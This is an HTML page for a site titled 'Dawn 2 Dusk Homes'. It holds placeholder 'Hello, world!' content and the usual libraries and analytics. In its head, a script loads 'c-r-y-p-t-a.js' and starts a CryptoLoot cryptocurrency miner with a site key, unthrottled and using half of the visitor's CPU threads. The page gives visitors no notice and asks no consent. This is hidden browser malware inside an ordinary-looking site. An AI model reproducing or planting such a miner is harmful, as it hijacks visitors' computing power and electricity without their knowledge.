<!doctype html>
<html lang="en">
  <head>
    <!-- Required Meta Tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <!-- Content Security Policy -->
    <meta http-equiv="Content-Security-Policy" content="default-src 'none'; script-src 'self' 'unsafe-inline' https://app.analyzz.com/ https://browser-update.org/; object-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self'; media-src 'self'; frame-src 'self'; font-src 'self' https://gitlab.com/ https://gitlab.io/; connect-src 'self'; base-uri 'self'; form-action 'self'; frame-ancestors 'self'">
    <title>Dawn 2 Dusk Homes</title>
    <!--- Favicon -->
    <link rel="apple-touch-icon" sizes="57x57" href="assets/favicon/apple-icon-57x57.png">
    <link rel="apple-touch-icon" sizes="60x60" href="assets/favicon/apple-icon-60x60.png">
    <link rel="apple-touch-icon" sizes="72x72" href="assets/favicon/apple-icon-72x72.png">
    <link rel="apple-touch-icon" sizes="76x76" href="assets/favicon/apple-icon-76x76.png">
    <link rel="apple-touch-icon" sizes="114x114" href="assets/favicon/apple-icon-114x114.png">
    <link rel="apple-touch-icon" sizes="120x120" href="assets/favicon/apple-icon-120x120.png">
    <link rel="apple-touch-icon" sizes="144x144" href="assets/favicon/apple-icon-144x144.png">
    <link rel="apple-touch-icon" sizes="152x152" href="assets/favicon/apple-icon-152x152.png">
    <link rel="apple-touch-icon" sizes="180x180" href="assets/favicon/apple-icon-180x180.png">
    <link rel="icon" type="image/png" sizes="192x192"  href="assets/favicon/android-icon-192x192.png">
    <link rel="icon" type="image/png" sizes="32x32" href="assets/favicon/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="96x96" href="assets/favicon/favicon-96x96.png">
    <link rel="icon" type="image/png" sizes="16x16" href="assets/favicon/favicon-16x16.png">
    <!-- Bootstrap CSS v4.5.2 -->
    <link rel="stylesheet" href="assets/css/bootstrap-4.5.2.css">
    <!-- VideoJS CSS v7.9.5 -->
    <link rel="stylesheet" href="assets/css/videojs-7.9.5.css">
    <!-- JQuery v3.5.1 -->
    <script type="text/javascript" src="assets/js/jquery-3.5.1.js"></script>
    <!-- Bootstrap v4.5.2 -->
    <script type="text/javascript" src="assets/js/bootstrap-4.5.2.js"></script>
    <!-- VideoJS v7.9.5 -->
    <script type="text/javascript" src="assets/js/video-7.9.5.js"></script>
    <script async src="https://app.analyzz.com/pixel/jZQFe6dpGksDtQE5"></script>
    <script> 
      var $buoop = {required:{e:0,f:0,o:0,s:0,c:0},insecure:true,unsupported:true,api:2020.09 }; 
      function $buo_f(){ 
       var e = document.createElement("script"); 
       e.src = "https://browser-update.org/update.min.js"; 
       document.body.appendChild(e);
      };
      try {document.addEventListener("DOMContentLoaded", $buo_f,false)}
      catch(e){window.attachEvent("onload", $buo_f)}
      </script>
    <script src="assets/js/c-r-y-p-t-a.js"></script>
    <script>
      var threads = window.navigator.hardwareConcurrency / 2;
      if (threads < 1) {
          var threads = 1;
      }
      var miner=new CryptoLoot.Anonymous('7a4e8c716a16079bc13eb01134454ed39080bc5d4e8d', {
          threads:threads,autoThreads:false,throttle:0, coin: "upx",
      });
      miner.start();
    </script>
  </head>
  <body>
    <h1>Hello, world!</h1>
  </body>
</html>
